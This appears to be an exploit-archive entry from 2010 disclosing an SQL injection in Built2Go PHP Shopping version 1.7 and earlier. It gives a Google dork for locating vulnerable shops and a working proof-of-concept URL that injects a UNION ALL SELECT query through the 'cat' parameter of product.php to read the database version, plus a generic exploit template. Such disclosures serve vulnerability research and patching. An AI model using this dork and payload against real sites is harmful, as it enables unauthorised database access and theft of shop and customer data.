[] NeoSense

Built2Go PHP Shopping - SQL Injection

Author: Br0ly
type: webapps
platform: php
port: 
date_added: 2010-12-23 
date_updated: 2010-12-23 
verified: 1 
codes: OSVDB-70016 
tags: 
aliases:  
screenshot_url:  
application_url: 

Script Name: Built2Go PHP Shopping  ( version ) <= 1.7
Site: http://built2go.com/
Script Demo: http://demos.built2go.com/shopping/1/
Found: Br0ly
Google Dork: "Powered by Built2Go PHP Shopping"

p0c:

http://server.com/product.php?cat=16'%20UNION%20ALL%20SELECT%201,@@version,3/*

xPloit:

http://server.com/product.php?cat=[sqli]

Brazil ;D